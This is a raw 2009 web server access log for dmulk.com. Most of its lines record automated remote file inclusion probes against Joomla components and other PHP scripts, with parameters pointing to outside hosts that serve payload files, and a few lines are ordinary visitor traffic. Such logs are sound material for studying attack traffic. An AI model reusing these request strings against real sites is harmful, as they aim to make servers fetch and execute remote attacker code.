95.211.85.68 - - [21/Jun/2009:10:09:18 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:09:59 -0700] "GET /logs/access_080831.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:09:59 -0700] "GET /logs/access_080831.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:10:08 -0700] "GET /logs/access_080503.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:10:09 -0700] "GET /logs/access_080831.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:10:09 -0700] "GET /logs/access_080503.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:10:13 -0700] "GET /logs/access_080503.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:10:10:27 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.43 - - [21/Jun/2009:10:10:28 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:10:10:28 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:10:10:32 -0700] "GET /logs/access_080901.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
95.211.85.68 - - [21/Jun/2009:10:10:36 -0700] "GET /logs/access_081105.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
209.90.77.43 - - [21/Jun/2009:10:10:39 -0700] "GET /logs/access_080313.log//appserv/main.php?appserv_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:10:10:43 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20912 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:10:45 -0700] "GET /logs/access_080403.log%20%20/errors.php?error=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:10:48 -0700] "GET /logs/access_081224.log%20%20/errors.php?error=http://www.portalsana.com.br/SiJi?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:11:04 -0700] "GET /logs/access_080831.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:11:09 -0700] "GET /logs/access_080503.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:11:15 -0700] "GET /logs/access_080107.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:11:20 -0700] "GET /logs/access_080107.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:11:23 -0700] "GET /logs/access_080516.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:10:11:30 -0700] "GET /logs/access_080512.log//skin/zero_vote/ask_password.php?dir=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:11:33 -0700] "GET /logs/access_080516.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.17 - - [21/Jun/2009:10:12:03 -0700] "GET /logs/access_090204.log/nav.php?loc=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:12:14 -0700] "GET /logs/access_080510.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:12:14 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:10:12:15 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
77.221.130.17 - - [21/Jun/2009:10:12:17 -0700] "GET /logs/access_090314.log/nav.php?loc=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:12:20 -0700] "GET /logs/access_080404.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:10:12:23 -0700] "GET /logs/access_080510.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:12:30 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20917 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:10:12:43 -0700] "GET /logs/access_080404.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:12:45 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:12:45 -0700] "GET /logs/access_080404.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:12:45 -0700] "GET /logs/access_080510.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:10:12:51 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:13:05 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20917 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:10:13:33 -0700] "GET /logs/access_080512.log//skin/zero_vote/ask_password.php?dir=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:13:50 -0700] "GET /logs/access_081021.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:13:52 -0700] "GET /logs/access_080107.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.78.238 - - [21/Jun/2009:10:13:56 -0700] "GET /logs/access_080723.log HTTP/1.0" 200 3134202 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:10:13:58 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [21/Jun/2009:10:14:20 -0700] "GET /logs//search/sphider/search.php?include_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [21/Jun/2009:10:14:20 -0700] "GET /logs/access_090530.log//search/sphider/search.php?include_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [21/Jun/2009:10:14:20 -0700] "GET /logs/access_090530.log//search/sphider/search.php?include_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [21/Jun/2009:10:14:20 -0700] "GET /search/sphider/search.php?include_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [21/Jun/2009:10:14:20 -0700] "GET /search/sphider/search.php?include_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [21/Jun/2009:10:14:20 -0700] "GET /logs//search/sphider/search.php?include_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:14:21 -0700] "GET /logs/access_080516.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:14:32 -0700] "GET /logs/access_080929.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:14:34 -0700] "GET /logs/access_081028.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.142.249 - - [21/Jun/2009:10:14:35 -0700] "GET /errors.php?error=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.142.249 - - [21/Jun/2009:10:14:42 -0700] "GET /logs/access_081026.log/errors.php?error=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.142.249 - - [21/Jun/2009:10:14:42 -0700] "GET /logs/errors.php?error=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.142.249 - - [21/Jun/2009:10:14:43 -0700] "GET /logs/access_080726.log/errors.php?error=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.30.100.97 - - [21/Jun/2009:10:14:53 -0700] "GET /logs/access_080723.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [21/Jun/2009:10:15:30 -0700] "GET /search/sphider/search.php?include_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [21/Jun/2009:10:15:30 -0700] "GET /logs//search/sphider/search.php?include_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [21/Jun/2009:10:15:30 -0700] "GET /logs/access_090530.log%20%20//search/sphider/search.php?include_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:15:31 -0700] "GET /logs/access_081021.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [21/Jun/2009:10:15:33 -0700] "GET /search/sphider/search.php?include_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [21/Jun/2009:10:15:33 -0700] "GET /logs//search/sphider/search.php?include_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [21/Jun/2009:10:15:33 -0700] "GET /logs/access_090530.log%20%20//search/sphider/search.php?include_dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:15:35 -0700] "GET /logs/access_081021.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:15:42 -0700] "GET /logs/access_081021.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:15:42 -0700] "GET /logs/access_080719.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:15:46 -0700] "GET /logs/access_080726.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:16:32 -0700] "GET /logs/access_081028.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:16:34 -0700] "GET /logs/access_081121.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [21/Jun/2009:10:16:44 -0700] "GET /logs/access_071111.log/?seite=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [21/Jun/2009:10:16:45 -0700] "GET /logs/?seite=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 200 105050 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:10:16:45 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
190.144.44.36 - - [21/Jun/2009:10:16:59 -0700] "GET /?seite=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 200 20990 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:17:42 -0700] "GET /logs/access_080404.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:17:43 -0700] "GET /logs/access_080510.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:17:55 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:17:55 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:17:59 -0700] "GET /logs/access_080111.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:17:59 -0700] "GET /logs/access_080120.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:18:00 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:18:00 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:18:00 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:18:00 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:18:04 -0700] "GET /logs/access_080111.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:18:04 -0700] "GET /logs/access_080120.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:18:04 -0700] "GET /logs/access_080111.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:18:04 -0700] "GET /logs/access_080120.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:10:19:20 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:19:21 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:19:21 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:19:26 -0700] "GET /logs/access_080111.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:19:26 -0700] "GET /logs/access_080120.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:19:33 -0700] "GET /logs/access_080510.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:10:19:33 -0700] "GET /logs/access_080404.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:19:58 -0700] "GET /logs/access_080111.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:19:58 -0700] "GET /logs/access_080120.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.231.138.99 - - [21/Jun/2009:10:20:09 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [21/Jun/2009:10:20:09 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [21/Jun/2009:10:20:09 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:20:10 -0700] "GET /logs/access_080111.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:20:10 -0700] "GET /logs/access_080120.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:20:11 -0700] "GET /logs/access_080111.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:20:11 -0700] "GET /logs/access_080120.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [21/Jun/2009:10:20:19 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
76.107.108.30 - - [21/Jun/2009:10:20:41 -0700] "GET /blog/index.php/2008/08/12/westoc-2008-trip-61208-62708/ HTTP/1.1" 200 65555 "-" "Opera/9.00 (Windows NT 5.1; U; en)" "dmulk.com"
213.189.2.38 - - [21/Jun/2009:10:20:49 -0700] "GET /logs/access_090317.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:10:20:50 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 200 105055 "-" "Mozilla/5.0" "www.dmulk.com"
